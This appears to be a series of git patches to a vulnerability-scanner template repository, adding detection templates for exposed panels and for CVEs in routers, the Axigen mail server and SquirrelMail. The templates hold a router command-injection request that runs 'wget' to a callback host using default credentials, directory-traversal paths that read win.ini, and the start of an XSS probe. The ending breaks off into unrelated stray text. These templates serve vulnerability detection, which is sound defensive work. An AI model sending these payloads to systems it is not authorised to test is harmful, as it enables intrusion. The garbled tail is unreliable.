Content-Type: application/x-www-form-urlencoded - submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0& save_apply=Run+Command&sysCmd=wget http://{{interactsh-url}} + submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}} POST /boafrm/formSysCmd HTTP/1.1 Host: {{Hostname}} @@ -32,7 +33,7 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0& save_apply=Run+Command&sysCmd=wget http://{{interactsh-url}} + submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}} matchers: - type: word From ef5a44cf052a8e37af5e6c95a22306bd9997f539 Mon Sep 17 00:00:00 2001 From: drighetto Date: Mon, 15 Nov 2021 13:53:43 +0100 Subject: [PATCH 3601/4083] Add a tpl for IBM MQSeries web console detection --- .../ibm/ibm-mqseries-web-console.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/ibm/ibm-mqseries-web-console.yaml diff --git a/exposed-panels/ibm/ibm-mqseries-web-console.yaml b/exposed-panels/ibm/ibm-mqseries-web-console.yaml new file mode 100644 index 0000000000..198caba17c --- /dev/null +++ b/exposed-panels/ibm/ibm-mqseries-web-console.yaml @@ -0,0 +1,22 @@ +id: ibm-mqseries-web-console + +info: + name: IBM MQSeries web console + author: righettod + severity: info + reference: https://www.ibm.com/docs/en/ibm-mq/9.0?topic=console-getting-started-mq + tags: panel,ibm + +requests: + - method: GET + path: + - '{{BaseURL}}/ibmmq/console/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'MQ Console' + - type: status + status: + - 200 From fbf50f11099a52a89d5435dda6d507e5e825766c Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 15 Nov 2021 21:00:17 +0530 Subject: [PATCH 3602/4083] format fixing --- technologies/graphql-detect.yaml | 2 +- vulnerabilities/wordpress/wordpress-debug-log.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index f4c4be2de5..5a6691f564 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -2,7 +2,7 @@ id: graphql-detect info: name: GraphQL API Detection - author: NkxxkN,ELSFA7110,@OFJAAAH + author: NkxxkN,ELSFA7110,OFJAAAH severity: info tags: tech,graphql,fuzz diff --git a/vulnerabilities/wordpress/wordpress-debug-log.yaml b/vulnerabilities/wordpress/wordpress-debug-log.yaml index ab180f5193..d53215ea1b 100644 --- a/vulnerabilities/wordpress/wordpress-debug-log.yaml +++ b/vulnerabilities/wordpress/wordpress-debug-log.yaml @@ -2,7 +2,7 @@ id: wp-debug-log info: name: WordPress debug log - author: geraldino2,@dwisiswant0 + author: geraldino2,dwisiswant0 severity: low tags: wordpress,log From 23c4a52aff483d7fa3a59c3e26eb1d6f9f87b6d3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Nov 2021 21:10:50 +0530 Subject: [PATCH 3603/4083] Create axigen-webmail.yaml --- exposed-panels/axigen-webmail.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/axigen-webmail.yaml diff --git a/exposed-panels/axigen-webmail.yaml b/exposed-panels/axigen-webmail.yaml new file mode 100644 index 0000000000..9db33d1bd4 --- /dev/null +++ b/exposed-panels/axigen-webmail.yaml @@ -0,0 +1,24 @@ +id: axigen-webmail + +info: + name: Axigen WebMail + author: dhiyaneshDk + severity: info + tags: axigen,panel + metadata: + shodan-query: 'http.title:"Axigen WebMail"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Axigen WebMail' + + - type: status + status: + - 200 From 1d8f4a1b01d18625b5b1ab3b132d4653d7c9ba12 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Nov 2021 21:13:34 +0530 Subject: [PATCH 3604/4083] Create axigen-webadmin.yaml --- exposed-panels/axigen-webadmin.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/axigen-webadmin.yaml diff --git a/exposed-panels/axigen-webadmin.yaml b/exposed-panels/axigen-webadmin.yaml new file mode 100644 index 0000000000..130d6959d9 --- /dev/null +++ b/exposed-panels/axigen-webadmin.yaml @@ -0,0 +1,24 @@ +id: axigen-webadmin + +info: + name: Axigen Web Admin + author: dhiyaneshDk + severity: info + tags: axigen,panel + metadata: + shodan-query: 'http.title:"Axigen WebAdmin"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Axigen WebAdmin' + + - type: status + status: + - 200 From c89128eaea50d8906da66d9c0d54891cd5073cf5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Nov 2021 21:17:27 +0530 Subject: [PATCH 3605/4083] Create CVE-2012-4940.yaml --- cves/2012/CVE-2012-4940.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2012/CVE-2012-4940.yaml diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml new file mode 100644 index 0000000000..5701fe8566 --- /dev/null +++ b/cves/2012/CVE-2012-4940.yaml @@ -0,0 +1,23 @@ +id: CVE-2012-4940 + +info: + name: Axigen Mail Server - 'Filename' Directory Traversal + author: dhiyaneshDk + severity: high + tags: axigen,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini" + - "{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini" + + stop-at-first-match: true + matchers: + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body From 0f5ae5efbac228af6b9fd69942f6aeef7feadb95 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Nov 2021 21:18:14 +0530 Subject: [PATCH 3606/4083] Update CVE-2012-4940.yaml --- cves/2012/CVE-2012-4940.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml index 5701fe8566..f33bf7d5f4 100644 --- a/cves/2012/CVE-2012-4940.yaml +++ b/cves/2012/CVE-2012-4940.yaml @@ -4,6 +4,7 @@ info: name: Axigen Mail Server - 'Filename' Directory Traversal author: dhiyaneshDk severity: high + reference: https://www.exploit-db.com/exploits/37996 tags: axigen,lfi requests: From 8f0c36f0365a4251fdf75c4da04d4363cfa6fba0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Nov 2021 15:49:39 +0000 Subject: [PATCH 3607/4083] Auto Generated CVE annotations [Mon Nov 15 15:49:39 UTC 2021] :robot: --- cves/2012/CVE-2012-4940.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml index f33bf7d5f4..868fe8c819 100644 --- a/cves/2012/CVE-2012-4940.yaml +++ b/cves/2012/CVE-2012-4940.yaml @@ -6,6 +6,7 @@ info: severity: high reference: https://www.exploit-db.com/exploits/37996 tags: axigen,lfi + description: "Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI." requests: - method: GET From 4b4d7fc7c31a5f2cc1c654592136475d568c712b Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 15 Nov 2021 22:31:08 +0530 Subject: [PATCH 3608/4083] misc fix --- cves/2012/CVE-2012-4940.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml index 868fe8c819..58679a3d38 100644 --- a/cves/2012/CVE-2012-4940.yaml +++ b/cves/2012/CVE-2012-4940.yaml @@ -4,22 +4,22 @@ info: name: Axigen Mail Server - 'Filename' Directory Traversal author: dhiyaneshDk severity: high + description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI. reference: https://www.exploit-db.com/exploits/37996 - tags: axigen,lfi - description: "Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI." + tags: cve,cve2012,axigen,lfi requests: - method: GET path: - - "{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini" - - "{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini" + - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini' + - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini' stop-at-first-match: true matchers: - type: word + part: body words: - "bit app support" - "fonts" - "extensions" - condition: and - part: body + condition: and \ No newline at end of file From 4f88a66890dfcf4d9c436111cfa198045efa302d Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 15 Nov 2021 23:05:21 +0530 Subject: [PATCH 3609/4083] misc update --- cves/2019/CVE-2019-19824.yaml | 9 --------- 1 file changed, 9 deletions(-) diff --git a/cves/2019/CVE-2019-19824.yaml b/cves/2019/CVE-2019-19824.yaml index f15395c196..6ae24e6e21 100644 --- a/cves/2019/CVE-2019-19824.yaml +++ b/cves/2019/CVE-2019-19824.yaml @@ -22,15 +22,6 @@ requests: POST /boafrm/formSysCmd HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46cGFzc3dvcmQ= - Accept: */* - Content-Type: application/x-www-form-urlencoded - - submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}} - - POST /boafrm/formSysCmd HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46YWRtaW4= - Accept: */* Content-Type: application/x-www-form-urlencoded submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}} From a0ce5a2918178f6d59d652d131955159e510a930 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Nov 2021 23:39:04 +0530 Subject: [PATCH 3610/4083] Create CVE-2002-1131.yaml --- cves/2002/CVE-2002-1131.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2002/CVE-2002-1131.yaml diff --git a/cves/2002/CVE-2002-1131.yaml b/cves/2002/CVE-2002-1131.yaml new file mode 100644 index 0000000000..b59119eaf9 --- /dev/null +++ b/cves/2002/CVE-2002-1131.yaml @@ -0,0 +1,34 @@ +id: CVE-2002-1131 + +info: + name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities + author: dhiyaneshDk + severity: medium + reference: https://www.exploit-db.com/exploits/21811 + description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + tags: xss,squirrelmail + +requests: + - method: GET + path: + - '{{BaseURL}}/src/addressbook.php?">
    troy + serial server
    邮局管理员可自行分配邮箱!